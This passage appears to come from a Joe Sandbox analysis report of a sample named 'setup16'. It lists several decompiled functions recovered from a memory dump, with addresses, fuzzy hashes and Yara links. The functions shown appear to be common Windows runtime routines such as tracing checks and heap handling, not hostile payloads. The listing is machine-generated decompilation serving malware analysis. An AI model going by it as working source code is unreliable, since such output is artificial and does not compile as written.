                                                                                                                                                                                                        • Instruction ID: 9ae1071b8ac1d9fec73ef4c625328d2a81552bf40f6bcc04a7ecbbbe67bd0e89
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7bd90213efb1621189cc8e95e95e5bed1dbf044292bceb7a8418cde6270552d3
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D1218E72A00108AFD715EF98DD81B6AB7BDFB44708F150478EA08AB252D379BD128B90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A46CF0 Relevance: .1, Instructions: 74COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                                                        			E04A46CF0(void* __edx, intOrPtr _a4, short _a8) {
				char _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v28;
				char _v36;
				char _v52;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char* _t21;
				void* _t24;
				void* _t36;
				void* _t38;
				void* _t46;

				_push(_t36);
				_t46 = __edx;
				_v12 = 0;
				_v8 = 0;
				_v20 = 0;
				_v16 = 0;
				if(E049E7D50() == 0) {
					_t21 = 0x7ffe0384;
				} else {
					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
				}
				if( *_t21 != 0) {
					_t21 =  *[fs:0x30];
					if((_t21[0x240] & 0x00000004) != 0) {
						if(E049E7D50() == 0) {
							_t21 = 0x7ffe0385;
						} else {
							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
						}
						if(( *_t21 & 0x00000020) != 0) {
							_t56 = _t46;
							if(_t46 == 0) {
								_t46 = 0x49a5c80;
							}
							_push(_t46);
							_push( &_v12);
							_t24 = E049FF6E0(_t36, 0, _t46, _t56);
							_push(_a4);
							_t38 = _t24;
							_push( &_v28);
							_t21 = E049FF6E0(_t38, 0, _t46, _t56);
							if(_t38 != 0) {
								if(_t21 != 0) {
									E04A47016(_a8, 0, 0, 0,  &_v36,  &_v28);
									L049E2400( &_v52);
								}
								_t21 = L049E2400( &_v28);
							}
						}
					}
				}
				return _t21;
			}



















                                                                                                                                                                                                        0x04a46cfb
                                                                                                                                                                                                        0x04a46d00
                                                                                                                                                                                                        0x04a46d02
                                                                                                                                                                                                        0x04a46d06
                                                                                                                                                                                                        0x04a46d0a
                                                                                                                                                                                                        0x04a46d0e
                                                                                                                                                                                                        0x04a46d19
                                                                                                                                                                                                        0x04a46d2b
                                                                                                                                                                                                        0x04a46d1b
                                                                                                                                                                                                        0x04a46d24
                                                                                                                                                                                                        0x04a46d24
                                                                                                                                                                                                        0x04a46d33
                                                                                                                                                                                                        0x04a46d39
                                                                                                                                                                                                        0x04a46d46
                                                                                                                                                                                                        0x04a46d4f
                                                                                                                                                                                                        0x04a46d61
                                                                                                                                                                                                        0x04a46d51
                                                                                                                                                                                                        0x04a46d5a
                                                                                                                                                                                                        0x04a46d5a
                                                                                                                                                                                                        0x04a46d69
                                                                                                                                                                                                        0x04a46d6b
                                                                                                                                                                                                        0x04a46d6d
                                                                                                                                                                                                        0x04a46d6f
                                                                                                                                                                                                        0x04a46d6f
                                                                                                                                                                                                        0x04a46d74
                                                                                                                                                                                                        0x04a46d79
                                                                                                                                                                                                        0x04a46d7a
                                                                                                                                                                                                        0x04a46d7f
                                                                                                                                                                                                        0x04a46d82
                                                                                                                                                                                                        0x04a46d88
                                                                                                                                                                                                        0x04a46d89
                                                                                                                                                                                                        0x04a46d90
                                                                                                                                                                                                        0x04a46d94
                                                                                                                                                                                                        0x04a46da7
                                                                                                                                                                                                        0x04a46db1
                                                                                                                                                                                                        0x04a46db1
                                                                                                                                                                                                        0x04a46dbb
                                                                                                                                                                                                        0x04a46dbb
                                                                                                                                                                                                        0x04a46d90
                                                                                                                                                                                                        0x04a46d69
                                                                                                                                                                                                        0x04a46d46
                                                                                                                                                                                                        0x04a46dc6

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 7554b5502f79974772b557395e558eeb0f49f266fafb8b5d5309ee91ba57b89b
                                                                                                                                                                                                        • Instruction ID: 8e0148c470834ea75c498bd9d61af4aa0e29267f94da27f5c93626f4ece5d228
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7554b5502f79974772b557395e558eeb0f49f266fafb8b5d5309ee91ba57b89b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 3621B072504B489BD712DF69C944B6BB7ECAFC2754F040566B94087251EB38E908C6A2
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A9070D Relevance: .1, Instructions: 72COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 67%
                                                                                                                                                                                                        			E04A9070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
				char _v8;
				intOrPtr _v11;
				signed int _v12;
				intOrPtr _v15;
				signed int _v16;
				intOrPtr _v28;
				void* __ebx;
				char* _t32;
				signed int* _t38;
				signed int _t60;

				_t38 = __ecx;
				_v16 = __edx;
				_t60 = E04A907DF(__ecx, __edx,  &_a4,  &_a8, 2);
				if(_t60 != 0) {
					_t7 = _t38 + 0x38; // 0x29cd5903
					_push( *_t7);
					_t9 = _t38 + 0x34; // 0x6adeeb00
					_push( *_t9);
					_v12 = _a8 << 0xc;
					_t11 = _t38 + 4; // 0x5de58b5b
					_push(0x4000);
					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
					E04A8AFDE( &_v8,  &_v12);
					E04A91293(_t38, _v28, _t60);
					if(E049E7D50() == 0) {
						_t32 = 0x7ffe0380;
					} else {
						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
					}
					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
						_t21 = _t38 + 0x3c; // 0xc3595e5f
						E04A814FB(_t38,  *_t21, _v11, _v15, 0xd);
					}
				}
				return  ~_t60;
			}













                                                                                                                                                                                                        0x04a9071b
                                                                                                                                                                                                        0x04a90724
                                                                                                                                                                                                        0x04a90734
                                                                                                                                                                                                        0x04a90738
                                                                                                                                                                                                        0x04a9074b
                                                                                                                                                                                                        0x04a9074b
                                                                                                                                                                                                        0x04a90753
                                                                                                                                                                                                        0x04a90753
                                                                                                                                                                                                        0x04a90759
                                                                                                                                                                                                        0x04a9075d
                                                                                                                                                                                                        0x04a90774
                                                                                                                                                                                                        0x04a90779
                                                                                                                                                                                                        0x04a9077d
                                                                                                                                                                                                        0x04a90789
                                                                                                                                                                                                        0x04a90795
                                                                                                                                                                                                        0x04a907a7
                                                                                                                                                                                                        0x04a90797
                                                                                                                                                                                                        0x04a907a0
                                                                                                                                                                                                        0x04a907a0
                                                                                                                                                                                                        0x04a907af
                                                                                                                                                                                                        0x04a907c4
                                                                                                                                                                                                        0x04a907cd
                                                                                                                                                                                                        0x04a907cd
                                                                                                                                                                                                        0x04a907af
                                                                                                                                                                                                        0x04a907dc

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                                                                                        • Instruction ID: 90e6291210ff6795476c1a48d351c47fd4ad7dbf9a0cf74417461e7a234db2e8
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: DB21F276208604AFDB05DF18C880A6ABBE5EBC4360F048569F9958B381D630ED09CB91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049EAE73 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 96%
                                                                                                                                                                                                        			E049EAE73(intOrPtr __ecx, void* __edx) {
				intOrPtr _v8;
				void* _t19;
				char* _t22;
				signed char* _t24;
				intOrPtr _t25;
				intOrPtr _t27;
				void* _t31;
				intOrPtr _t36;
				char* _t38;
				signed char* _t42;

				_push(__ecx);
				_t31 = __edx;
				_v8 = __ecx;
				_t19 = E049E7D50();
				_t38 = 0x7ffe0384;
				if(_t19 != 0) {
					_t22 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
				} else {
					_t22 = 0x7ffe0384;
				}
				_t42 = 0x7ffe0385;
				if( *_t22 != 0) {
					if(E049E7D50() == 0) {
						_t24 = 0x7ffe0385;
					} else {
						_t24 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
					}
					if(( *_t24 & 0x00000010) != 0) {
						goto L17;
					} else {
						goto L3;
					}
				} else {
					L3:
					_t27 = E049E7D50();
					if(_t27 != 0) {
						_t27 =  *[fs:0x30];
						_t38 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22a;
					}
					if( *_t38 != 0) {
						_t27 =  *[fs:0x30];
						if(( *(_t27 + 0x240) & 0x00000004) == 0) {
							goto L5;
						}
						_t27 = E049E7D50();
						if(_t27 != 0) {
							_t27 =  *[fs:0x30];
							_t42 =  *((intOrPtr*)(_t27 + 0x50)) + 0x22b;
						}
						if(( *_t42 & 0x00000020) != 0) {
							L17:
							_t25 = _v8;
							_t36 = 0;
							if(_t25 != 0) {
								_t36 =  *((intOrPtr*)(_t25 + 0x18));
							}
							_t27 = E04A47794( *((intOrPtr*)(_t31 + 0x18)), _t36,  *((intOrPtr*)(_t31 + 0x94)),  *(_t31 + 0x24) & 0x0000ffff,  *((intOrPtr*)(_t31 + 0x28)));
						}
						goto L5;
					} else {
						L5:
						return _t27;
					}
				}
			}













                                                                                                                                                                                                        0x049eae78
                                                                                                                                                                                                        0x049eae7c
                                                                                                                                                                                                        0x049eae7e
                                                                                                                                                                                                        0x049eae81
                                                                                                                                                                                                        0x049eae86
                                                                                                                                                                                                        0x049eae8d
                                                                                                                                                                                                        0x04a32691
                                                                                                                                                                                                        0x049eae93
                                                                                                                                                                                                        0x049eae93
                                                                                                                                                                                                        0x049eae93
                                                                                                                                                                                                        0x049eae98
                                                                                                                                                                                                        0x049eae9d
                                                                                                                                                                                                        0x04a326a2
                                                                                                                                                                                                        0x04a326b4
                                                                                                                                                                                                        0x04a326a4
                                                                                                                                                                                                        0x04a326ad
                                                                                                                                                                                                        0x04a326ad
                                                                                                                                                                                                        0x04a326b9
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a326bb
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a326bb
                                                                                                                                                                                                        0x049eaea3
                                                                                                                                                                                                        0x049eaea3
                                                                                                                                                                                                        0x049eaea3
                                                                                                                                                                                                        0x049eaeaa
                                                                                                                                                                                                        0x04a326c0
                                                                                                                                                                                                        0x04a326c9
                                                                                                                                                                                                        0x04a326c9
                                                                                                                                                                                                        0x049eaeb3
                                                                                                                                                                                                        0x04a326d4
                                                                                                                                                                                                        0x04a326e1
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a326e7
                                                                                                                                                                                                        0x04a326ee
                                                                                                                                                                                                        0x04a326f0
                                                                                                                                                                                                        0x04a326f9
                                                                                                                                                                                                        0x04a326f9
                                                                                                                                                                                                        0x04a32702
                                                                                                                                                                                                        0x04a32708
                                                                                                                                                                                                        0x04a32708
                                                                                                                                                                                                        0x04a3270b
                                                                                                                                                                                                        0x04a3270f
                                                                                                                                                                                                        0x04a32711
                                                                                                                                                                                                        0x04a32711
                                                                                                                                                                                                        0x04a32725
                                                                                                                                                                                                        0x04a32725
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049eaeb9
                                                                                                                                                                                                        0x049eaeb9
                                                                                                                                                                                                        0x049eaebf
                                                                                                                                                                                                        0x049eaebf
                                                                                                                                                                                                        0x049eaeb3

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                                                                                        • Instruction ID: 0e8db8bd1ceb9dfe478b17f477873e34c56cace21ed9d955480158fc8c90f221
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 892ffc7d7f960dfab719e72e37e7183e7cc58ff0f898e4f283d94cb5f6144d78
                                                                                                                                                                                                        • Instruction Fuzzy Hash: FC21D172601684DFEB269B6AC948B3577E9EF84344F0900F5ED048B6A2F738FC40C6A1
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 04A47794 Relevance: .1, Instructions: 70COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E04A47794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _t21;
				void* _t24;
				intOrPtr _t25;
				void* _t36;
				short _t39;
				signed char* _t42;
				unsigned int _t46;
				void* _t50;

				_push(__ecx);
				_push(__ecx);
				_t21 =  *0x4ab7b9c; // 0x0
				_t46 = _a8;
				_v12 = __edx;
				_v8 = __ecx;
				_t4 = _t46 + 0x2e; // 0x2e
				_t36 = _t4;
				_t24 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
				_t50 = _t24;
				if(_t50 != 0) {
					_t25 = _a4;
					if(_t25 == 5) {
						L3:
						_t39 = 0x14b1;
					} else {
						_t39 = 0x14b0;
						if(_t25 == 6) {
							goto L3;
						}
					}
					 *((short*)(_t50 + 6)) = _t39;
					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
					_t11 = _t50 + 0x2c; // 0x2c
					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
					E04A0F3E0(_t11, _a12, _t46);
					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
					if(E049E7D50() == 0) {
						_t42 = 0x7ffe0384;
					} else {
						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
					}
					_push(_t50);
					_t19 = _t36 - 0x20; // 0xe
					_push(0x403);
					_push( *_t42 & 0x000000ff);
					E04A09AE0();
					_t24 = L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
				}
				return _t24;
			}













                                                                                                                                                                                                        0x04a47799
                                                                                                                                                                                                        0x04a4779a
                                                                                                                                                                                                        0x04a4779b
                                                                                                                                                                                                        0x04a477a3
                                                                                                                                                                                                        0x04a477ab
                                                                                                                                                                                                        0x04a477ae
                                                                                                                                                                                                        0x04a477b1
                                                                                                                                                                                                        0x04a477b1
                                                                                                                                                                                                        0x04a477bf
                                                                                                                                                                                                        0x04a477c4
                                                                                                                                                                                                        0x04a477c8
                                                                                                                                                                                                        0x04a477ce
                                                                                                                                                                                                        0x04a477d4
                                                                                                                                                                                                        0x04a477e0
                                                                                                                                                                                                        0x04a477e0
                                                                                                                                                                                                        0x04a477d6
                                                                                                                                                                                                        0x04a477d6
                                                                                                                                                                                                        0x04a477de
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a477de
                                                                                                                                                                                                        0x04a477e5
                                                                                                                                                                                                        0x04a477f0
                                                                                                                                                                                                        0x04a477f3
                                                                                                                                                                                                        0x04a477f6
                                                                                                                                                                                                        0x04a477fd
                                                                                                                                                                                                        0x04a47800
                                                                                                                                                                                                        0x04a4780c
                                                                                                                                                                                                        0x04a47818
                                                                                                                                                                                                        0x04a4782b
                                                                                                                                                                                                        0x04a4781a
                                                                                                                                                                                                        0x04a47823
                                                                                                                                                                                                        0x04a47823
                                                                                                                                                                                                        0x04a47830
                                                                                                                                                                                                        0x04a47831
                                                                                                                                                                                                        0x04a47838
                                                                                                                                                                                                        0x04a4783d
                                                                                                                                                                                                        0x04a4783e
                                                                                                                                                                                                        0x04a4784f
                                                                                                                                                                                                        0x04a4784f
                                                                                                                                                                                                        0x04a4785a

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0306ff1cf49df1b836a4536cc2e37e3eacfe85fd94cd9aafbf722cb0fdf60962
                                                                                                                                                                                                        • Instruction ID: 672410f523107a8e22520b3705329cf1b3eb6438dabf5d5a3c2b76ec13b737ba
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0306ff1cf49df1b836a4536cc2e37e3eacfe85fd94cd9aafbf722cb0fdf60962
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 6E219D76900644ABC725DFA9D890EABB7A8EFC8750F104569F50AD7690E734E900CBA4
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FFD9B Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 93%
                                                                                                                                                                                                        			E049FFD9B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				intOrPtr _v8;
				void* _t19;
				intOrPtr _t29;
				intOrPtr _t32;
				intOrPtr _t35;
				intOrPtr _t37;
				intOrPtr* _t40;

				_t35 = __edx;
				_push(__ecx);
				_push(__ecx);
				_t37 = 0;
				_v8 = __edx;
				_t29 = __ecx;
				if( *((intOrPtr*)( *[fs:0x18] + 0xfbc)) != 0) {
					_t40 =  *((intOrPtr*)( *[fs:0x18] + 0xfbc));
					L3:
					_t19 = _a4 - 4;
					if(_t19 != 0) {
						if(_t19 != 1) {
							L7:
							return _t37;
						}
						if(_t35 == 0) {
							L11:
							_t37 = 0xc000000d;
							goto L7;
						}
						if( *((intOrPtr*)(_t40 + 4)) != _t37) {
							L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37,  *((intOrPtr*)(_t40 + 4)));
							_t35 = _v8;
						}
						 *((intOrPtr*)(_t40 + 4)) = _t35;
						goto L7;
					}
					if(_t29 == 0) {
						goto L11;
					}
					_t32 =  *_t40;
					if(_t32 != 0) {
						 *((intOrPtr*)(_t29 + 0x20)) =  *((intOrPtr*)(_t32 + 0x20));
						E049D76E2( *_t40);
					}
					 *_t40 = _t29;
					goto L7;
				}
				_t40 = L049E4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 8);
				if(_t40 == 0) {
					_t37 = 0xc0000017;
					goto L7;
				}
				_t35 = _v8;
				 *_t40 = 0;
				 *((intOrPtr*)(_t40 + 4)) = 0;
				 *((intOrPtr*)( *[fs:0x18] + 0xfbc)) = _t40;
				goto L3;
			}










                                                                                                                                                                                                        0x049ffd9b
                                                                                                                                                                                                        0x049ffda0
                                                                                                                                                                                                        0x049ffda1
                                                                                                                                                                                                        0x049ffdab
                                                                                                                                                                                                        0x049ffdad
                                                                                                                                                                                                        0x049ffdb0
                                                                                                                                                                                                        0x049ffdb8
                                                                                                                                                                                                        0x049ffe0f
                                                                                                                                                                                                        0x049ffde6
                                                                                                                                                                                                        0x049ffde9
                                                                                                                                                                                                        0x049ffdec
                                                                                                                                                                                                        0x04a3c0c0
                                                                                                                                                                                                        0x049ffdfe
                                                                                                                                                                                                        0x049ffe06
                                                                                                                                                                                                        0x049ffe06
                                                                                                                                                                                                        0x04a3c0c8
                                                                                                                                                                                                        0x049ffe2d
                                                                                                                                                                                                        0x049ffe2d
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffe2d
                                                                                                                                                                                                        0x04a3c0d1
                                                                                                                                                                                                        0x04a3c0e0
                                                                                                                                                                                                        0x04a3c0e5
                                                                                                                                                                                                        0x04a3c0e5
                                                                                                                                                                                                        0x04a3c0e8
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x04a3c0e8
                                                                                                                                                                                                        0x049ffdf4
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffdf6
                                                                                                                                                                                                        0x049ffdfa
                                                                                                                                                                                                        0x049ffe1a
                                                                                                                                                                                                        0x049ffe1f
                                                                                                                                                                                                        0x049ffe1f
                                                                                                                                                                                                        0x049ffdfc
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffdfc
                                                                                                                                                                                                        0x049ffdcc
                                                                                                                                                                                                        0x049ffdd0
                                                                                                                                                                                                        0x049ffe26
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x049ffe26
                                                                                                                                                                                                        0x049ffdd8
                                                                                                                                                                                                        0x049ffddb
                                                                                                                                                                                                        0x049ffddd
                                                                                                                                                                                                        0x049ffde0
                                                                                                                                                                                                        0x00000000

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                                                                                        • Instruction ID: 82155c2423f13463d1616e1a7cbaa48205cac79896cd53b643796dd656571f79
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bea69b06ccd41e2ab95b3552422c6337f6d423ba3d9b45e75fab26429da45353
                                                                                                                                                                                                        • Instruction Fuzzy Hash: AF218E72A00A40DFD735CF4AD944E66F7E9EB94B10F2585BEEA4587619E730BC00DB90
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049C9240 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 77%
                                                                                                                                                                                                        			E049C9240(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t33;
				intOrPtr _t37;
				intOrPtr _t41;
				intOrPtr* _t46;
				void* _t48;
				intOrPtr _t50;
				intOrPtr* _t60;
				void* _t61;
				intOrPtr _t62;
				intOrPtr _t65;
				void* _t66;
				void* _t68;

				_push(0xc);
				_push(0x4a9f708);
				E04A1D08C(__ebx, __edi, __esi);
				_t65 = __ecx;
				 *((intOrPtr*)(_t68 - 0x1c)) = __ecx;
				if( *(__ecx + 0x24) != 0) {
					_push( *(__ecx + 0x24));
					E04A095D0();
					 *(__ecx + 0x24) =  *(__ecx + 0x24) & 0x00000000;
				}
				L6();
				L6();
				_push( *((intOrPtr*)(_t65 + 0x28)));
				E04A095D0();
				_t33 =  *0x4ab84c4; // 0x0
				L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t33 + 0xc0000,  *((intOrPtr*)(_t65 + 0x10)));
				_t37 =  *0x4ab84c4; // 0x0
				L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t37 + 0xc0000,  *((intOrPtr*)(_t65 + 0x1c)));
				_t41 =  *0x4ab84c4; // 0x0
				E049E2280(L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t41 + 0xc0000,  *((intOrPtr*)(_t65 + 0x20))), 0x4ab86b4);
				 *(_t68 - 4) =  *(_t68 - 4) & 0x00000000;
				_t46 = _t65 + 0xe8;
				_t62 =  *_t46;
				_t60 =  *((intOrPtr*)(_t46 + 4));
				if( *((intOrPtr*)(_t62 + 4)) != _t46 ||  *_t60 != _t46) {
					_t61 = 3;
					asm("int 0x29");
					_push(_t65);
					_t66 = _t61;
					_t23 = _t66 + 0x14; // 0x8df8084c
					_push( *_t23);
					E04A095D0();
					_t24 = _t66 + 0x10; // 0x89e04d8b
					_push( *_t24);
					 *(_t66 + 0x38) =  *(_t66 + 0x38) & 0x00000000;
					_t48 = E04A095D0();
					 *(_t66 + 0x14) =  *(_t66 + 0x14) & 0x00000000;
					 *(_t66 + 0x10) =  *(_t66 + 0x10) & 0x00000000;
					return _t48;
				} else {
					 *_t60 = _t62;
					 *((intOrPtr*)(_t62 + 4)) = _t60;
					 *(_t68 - 4) = 0xfffffffe;
					E049C9325();
					_t50 =  *0x4ab84c4; // 0x0
					return E04A1D0D1(L049E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t50 + 0xc0000, _t65));
				}
			}















                                                                                                                                                                                                        0x049c9240
                                                                                                                                                                                                        0x049c9242
                                                                                                                                                                                                        0x049c9247
                                                                                                                                                                                                        0x049c924c
                                                                                                                                                                                                        0x049c924e
                                                                                                                                                                                                        0x049c9255
                                                                                                                                                                                                        0x049c9257
                                                                                                                                                                                                        0x049c925a
                                                                                                                                                                                                        0x049c925f
                                                                                                                                                                                                        0x049c925f
                                                                                                                                                                                                        0x049c9266
                                                                                                                                                                                                        0x049c9271
                                                                                                                                                                                                        0x049c9276
                                                                                                                                                                                                        0x049c9279
                                                                                                                                                                                                        0x049c927e
                                                                                                                                                                                                        0x049c9295
                                                                                                                                                                                                        0x049c929a
                                                                                                                                                                                                        0x049c92b1
                                                                                                                                                                                                        0x049c92b6
                                                                                                                                                                                                        0x049c92d7
                                                                                                                                                                                                        0x049c92dc
                                                                                                                                                                                                        0x049c92e0
                                                                                                                                                                                                        0x049c92e6
                                                                                                                                                                                                        0x049c92e8
                                                                                                                                                                                                        0x049c92ee
                                                                                                                                                                                                        0x049c9332
                                                                                                                                                                                                        0x049c9333
                                                                                                                                                                                                        0x049c9337
                                                                                                                                                                                                        0x049c9338
                                                                                                                                                                                                        0x049c933a
                                                                                                                                                                                                        0x049c933a
                                                                                                                                                                                                        0x049c933d
                                                                                                                                                                                                        0x049c9342
                                                                                                                                                                                                        0x049c9342
                                                                                                                                                                                                        0x049c9345
                                                                                                                                                                                                        0x049c9349
                                                                                                                                                                                                        0x049c934e
                                                                                                                                                                                                        0x049c9352
                                                                                                                                                                                                        0x049c9357
                                                                                                                                                                                                        0x049c92f4
                                                                                                                                                                                                        0x049c92f4
                                                                                                                                                                                                        0x049c92f6
                                                                                                                                                                                                        0x049c92f9
                                                                                                                                                                                                        0x049c9300
                                                                                                                                                                                                        0x049c9306
                                                                                                                                                                                                        0x049c9324
                                                                                                                                                                                                        0x049c9324

                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000006.00000002.370501493.00000000049A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 049A0000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_6_2_49a0000_setup16.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 2994545307-0
                                                                                                                                                                                                        • Opcode ID: 92b4f21bffb20a948abb84d2ece2e40507b963c3f5d5558ba770a626f1755b51
                                                                                                                                                                                                        • Instruction ID: 8df58b4a50737564f6542a9e184744b6bcaff7c304ae27cbea819194c02af79e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 92b4f21bffb20a948abb84d2ece2e40507b963c3f5d5558ba770a626f1755b51
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F0214A71041A00DFD726EF68DA00F16B7B9FF48708F0449ACA049866B2C739F942CB85
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 049FB390 Relevance: .1, Instructions: 63COMMON
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 54%
